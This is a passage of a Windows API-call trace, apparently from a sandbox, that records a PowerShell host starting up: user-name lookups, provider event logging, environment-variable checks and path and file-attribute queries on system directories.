	[0383.514] CoTaskMemFree (pv=0x1b723a00) 
	[0383.514] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0383.514] GetUserNameW (in: lpBuffer=0x3c94a0, pcbBuffer=0x14d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d4a8) returned 1
	[0383.515] CoTaskMemFree (pv=0x3c94a0) 
	[0383.515] ReportEventW (hEventLog=0x1b7f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c7d408*="Registry", lpRawData=0x2c7d198) returned 1
	[0384.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0384.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0384.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0384.016] CoTaskMemAlloc (cb=0x804) returned 0x1b723a00
	[0384.016] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b723a00, nSize=0x14d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d468) returned 0x1
	[0384.016] CoTaskMemFree (pv=0x1b723a00) 
	[0384.016] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0384.016] GetUserNameW (in: lpBuffer=0x3c94a0, pcbBuffer=0x14d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d4a8) returned 1
	[0384.016] CoTaskMemFree (pv=0x3c94a0) 
	[0384.017] ReportEventW (hEventLog=0x1b7f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c82820*="Variable", lpRawData=0x2c825b0) returned 1
	[0384.019] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0384.019] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0384.019] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0384.022] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0384.022] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0384.022] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0384.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0384.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0384.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0384.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0384.423] CoTaskMemAlloc (cb=0x804) returned 0x1b723a00
	[0384.423] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b723a00, nSize=0x14d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d468) returned 0x1
	[0384.424] CoTaskMemFree (pv=0x1b723a00) 
	[0384.424] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0384.424] GetUserNameW (in: lpBuffer=0x3c94a0, pcbBuffer=0x14d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d4a8) returned 1
	[0384.424] CoTaskMemFree (pv=0x3c94a0) 
	[0384.425] ReportEventW (hEventLog=0x1b7f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c96438*="Certificate", lpRawData=0x2c961c8) returned 1
	[0384.659] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0384.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0384.659] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0384.663] GetLogicalDrives () returned 0x4
	[0384.663] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0384.663] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0384.664] CoTaskMemAlloc (cb=0x20e) returned 0x417250
	[0384.664] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x417250 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0384.664] CoTaskMemFree (pv=0x417250) 
	[0384.665] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0384.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0384.666] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0384.666] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0384.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0384.666] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0384.678] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0384.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0384.679] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0384.681] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0384.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0384.681] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0384.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0384.682] SetErrorMode (uMode=0x1) returned 0x1
	[0384.682] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d0b0 | out: lpFileInformation=0x14d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0384.682] SetErrorMode (uMode=0x1) returned 0x1
	[0384.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0384.682] SetErrorMode (uMode=0x1) returned 0x1
	[0384.683] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d0b0 | out: lpFileInformation=0x14d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0384.683] SetErrorMode (uMode=0x1) returned 0x1
	[0384.683] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0384.683] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0384.683] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0384.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0384.689] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14ce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0384.689] SetErrorMode (uMode=0x1) returned 0x1
	[0384.689] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d070 | out: lpFileInformation=0x14d070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0384.689] SetErrorMode (uMode=0x1) returned 0x1
	[0384.689] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14ce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0384.689] SetErrorMode (uMode=0x1) returned 0x1
	[0384.689] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d070 | out: lpFileInformation=0x14d070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0384.689] SetErrorMode (uMode=0x1) returned 0x1
	[0384.690] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14ce70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0384.690] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0384.690] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0384.690] SetErrorMode (uMode=0x1) returned 0x1
	[0384.690] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d070 | out: lpFileInformation=0x14d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0384.690] SetErrorMode (uMode=0x1) returned 0x1
	[0384.690] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0384.690] SetErrorMode (uMode=0x1) returned 0x1
	[0384.690] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d070 | out: lpFileInformation=0x14d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0384.690] SetErrorMode (uMode=0x1) returned 0x1
	[0384.690] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0384.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0384.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0384.691] SetErrorMode (uMode=0x1) returned 0x1
	[0384.691] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d070 | out: lpFileInformation=0x14d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0384.691] SetErrorMode (uMode=0x1) returned 0x1
	[0384.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0384.691] SetErrorMode (uMode=0x1) returned 0x1
	[0384.691] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d070 | out: lpFileInformation=0x14d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0384.691] SetErrorMode (uMode=0x1) returned 0x1
	[0384.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0384.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0384.692] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0384.692] SetErrorMode (uMode=0x1) returned 0x1
	[0384.692] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d0b0 | out: lpFileInformation=0x14d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0384.692] SetErrorMode (uMode=0x1) returned 0x1
	[0384.692] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0384.692] SetErrorMode (uMode=0x1) returned 0x1
	[0384.692] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d0b0 | out: lpFileInformation=0x14d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0384.692] SetErrorMode (uMode=0x1) returned 0x1
	[0384.692] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0384.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0384.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0384.693] SetErrorMode (uMode=0x1) returned 0x1
	[0384.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d0b0 | out: lpFileInformation=0x14d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0384.693] SetErrorMode (uMode=0x1) returned 0x1
	[0384.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0384.693] SetErrorMode (uMode=0x1) returned 0x1
	[0384.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d0b0 | out: lpFileInformation=0x14d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0384.693] SetErrorMode (uMode=0x1) returned 0x1
	[0384.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0384.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0384.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0384.695] SetErrorMode (uMode=0x1) returned 0x1
	[0384.695] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d370 | out: lpFileInformation=0x14d370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0384.695] SetErrorMode (uMode=0x1) returned 0x1
	[0384.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0384.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0384.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0384.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.015] CoTaskMemAlloc (cb=0x804) returned 0x1b723a00
	[0385.015] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b723a00, nSize=0x14d6d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d6d8) returned 0x1
	[0385.016] CoTaskMemFree (pv=0x1b723a00) 
	[0385.016] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0385.016] GetUserNameW (in: lpBuffer=0x3c94a0, pcbBuffer=0x14d718 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d718) returned 1
	[0385.016] CoTaskMemFree (pv=0x3c94a0) 
	[0385.018] ReportEventW (hEventLog=0x1b7f0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ccf120*="Available", lpRawData=0x2cceeb0) returned 1
	[0385.216] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0385.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.216] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0385.217] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0385.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.217] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0385.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.220] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0385.220] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0385.220] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0385.220] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
